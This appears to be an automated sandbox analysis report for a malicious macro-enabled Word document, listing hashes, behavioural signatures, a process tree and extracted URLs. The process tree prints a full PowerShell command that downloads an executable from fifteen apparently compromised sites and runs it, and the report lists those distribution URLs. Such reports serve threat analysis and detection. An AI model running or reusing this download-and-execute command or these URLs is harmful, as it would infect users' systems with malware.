Analysis
-
max time kernel
104s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
21-05-2022 03:39
Static task
static1
Behavioral task
behavioral1
Sample
DieKlage-01092020-1994462004.docm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
DieKlage-01092020-1994462004.docm
Resource
win10v2004-20220414-en
General
-
Target
DieKlage-01092020-1994462004.docm
-
Size
90KB
-
MD5
09c2efc28d71216d95c49b33f24af6e3
-
SHA1
b8b3a9a39486c91222494004ef2498e977ad7524
-
SHA256
94027e02da7382882c8046e165ba9bdf7b3fc801ecf35ab3f004b1a3fdcc743c
-
SHA512
be8158bcb2a6adccffd5d5486b0d4c51463df654d017e0ca58466a9d46c9c23a9811200779333d803933c402c8f660200db1e7c5c89796c83e1c4f3ed9ab67a3
Malware Config
Extracted
http://rodrigodecamargo.com.br/vhtderi/555555555.png
http://www.lelamantin.fr/uboljzeqfb/555555555.png
http://somethingspecialrd.com/emdnfin/555555555.png
http://www.intiming.it/zopnivucop/555555555.png
http://funminews.com/tdtmxmcjtkqo/555555555.png
http://lesehanpelangi.com/vswrdyzgo/555555555.png
http://anamtaexports.in/gbfrctzj/555555555.png
http://ebooks.libraryrule.com/ttfzyugewvft/555555555.png
http://the-lobby.org/xqjzx/555555555.png
http://www.biocosmeticashop.com/tftkbe/555555555.png
http://birlafincorp.com/xoygkcfaea/555555555.png
http://shainasaw.com/bvjlok/555555555.png
http://www.hygienicwallcladding.com/ucbucwmtfkan/555555555.png
http://marudhralive.com/ggyofqrt/555555555.png
http://dienmayhoatan.com/fmyctrjeqrxw/555555555.png
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
explorer.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1988 3092 explorer.exe WINWORD.EXE -
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 43 2656 powershell.exe 47 2656 powershell.exe 52 2656 powershell.exe 56 2656 powershell.exe 57 2656 powershell.exe 59 2656 powershell.exe 62 2656 powershell.exe 64 2656 powershell.exe 71 2656 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies registry class 1 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings explorer.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3092 WINWORD.EXE 3092 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2656 powershell.exe 2656 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2656 powershell.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
WINWORD.EXEpid process 3092 WINWORD.EXE 3092 WINWORD.EXE 3092 WINWORD.EXE 3092 WINWORD.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
WINWORD.EXEexplorer.exeWScript.execmd.exedescription pid process target process PID 3092 wrote to memory of 1988 3092 WINWORD.EXE explorer.exe PID 3092 wrote to memory of 1988 3092 WINWORD.EXE explorer.exe PID 544 wrote to memory of 4796 544 explorer.exe WScript.exe PID 544 wrote to memory of 4796 544 explorer.exe WScript.exe PID 4796 wrote to memory of 1300 4796 WScript.exe cmd.exe PID 4796 wrote to memory of 1300 4796 WScript.exe cmd.exe PID 1300 wrote to memory of 2656 1300 cmd.exe powershell.exe PID 1300 wrote to memory of 2656 1300 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\DieKlage-01092020-1994462004.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exeexplorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs2⤵
- Process spawned unexpected child process
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ApplesHelper\HGFTYUGYtyftTDFTYFYF.cmd" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOWerShell Foreach($url in @('http://rodrigodecamargo.com.br/vhtderi/555555555.png','http://www.lelamantin.fr/uboljzeqfb/555555555.png','http://somethingspecialrd.com/emdnfin/555555555.png','http://www.intiming.it/zopnivucop/555555555.png','http://funminews.com/tdtmxmcjtkqo/555555555.png','http://lesehanpelangi.com/vswrdyzgo/555555555.png','http://anamtaexports.in/gbfrctzj/555555555.png','http://ebooks.libraryrule.com/ttfzyugewvft/555555555.png','http://the-lobby.org/xqjzx/555555555.png','http://www.biocosmeticashop.com/tftkbe/555555555.png','http://birlafincorp.com/xoygkcfaea/555555555.png','http://shainasaw.com/bvjlok/555555555.png','http://www.hygienicwallcladding.com/ucbucwmtfkan/555555555.png','http://marudhralive.com/ggyofqrt/555555555.png','http://dienmayhoatan.com/fmyctrjeqrxw/555555555.png')) { try{$path = 'C:\ApplesHelper\KLHutufguyguyfgxdfg.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ApplesHelper\HGFTYUGYtyftTDFTYFYF.cmdFilesize
24KB
MD5db94c28610cb83c3056f1ae4e3e80463
SHA1174cb2cc87ff32c50b752a94eda80121811014bd
SHA25672223739a61890dac3cef9147aaa16b447d977cdf6ee413535a2826931db2b2d
SHA512f94ec877c58b4c5aa503e2fff42deb8925c17d7fddbf4d10e4856b2254dc81117d0f9a1ec21ed4444a3e90d2c28e86fd1e776448f3aa80cb8977ca7021cb85e9
-
C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbsFilesize
74KB
MD55ba27fb265515da4386aa9c025826e3a
SHA116a4dfd513bd36714e560a3fcca8c3b846e2da57
SHA256f9655447610215ddd56d097ea5bdeaaa1f7a730d66945c0cc86d8de51c5bb15e
SHA512977e4954d5ec90f2306d34f95fc4898e1309f1272306c3e70616738ef49eb1f53b8689580d8ddffa677f02b68ba90ef4f0ad45456a4e27ac9367f284823819b3
-
memory/1300-142-0x0000000000000000-mapping.dmp
-
memory/1988-138-0x0000000000000000-mapping.dmp
-
memory/2656-146-0x00007FFD358A0000-0x00007FFD36361000-memory.dmpFilesize
10.8MB
-
memory/2656-145-0x00000222A4F40000-0x00000222A4F62000-memory.dmpFilesize
136KB
-
memory/2656-144-0x0000000000000000-mapping.dmp
-
memory/3092-135-0x00007FFD1E400000-0x00007FFD1E410000-memory.dmpFilesize
64KB
-
memory/3092-137-0x000001980EA10000-0x000001980EA14000-memory.dmpFilesize
16KB
-
memory/3092-136-0x00007FFD1E400000-0x00007FFD1E410000-memory.dmpFilesize
64KB
-
memory/3092-130-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmpFilesize
64KB
-
memory/3092-134-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmpFilesize
64KB
-
memory/3092-133-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmpFilesize
64KB
-
memory/3092-131-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmpFilesize
64KB
-
memory/3092-132-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmpFilesize
64KB
-
memory/3092-147-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmpFilesize
64KB
-
memory/3092-149-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmpFilesize
64KB
-
memory/3092-148-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmpFilesize
64KB
-
memory/3092-150-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmpFilesize
64KB
-
memory/4796-141-0x0000000000000000-mapping.dmp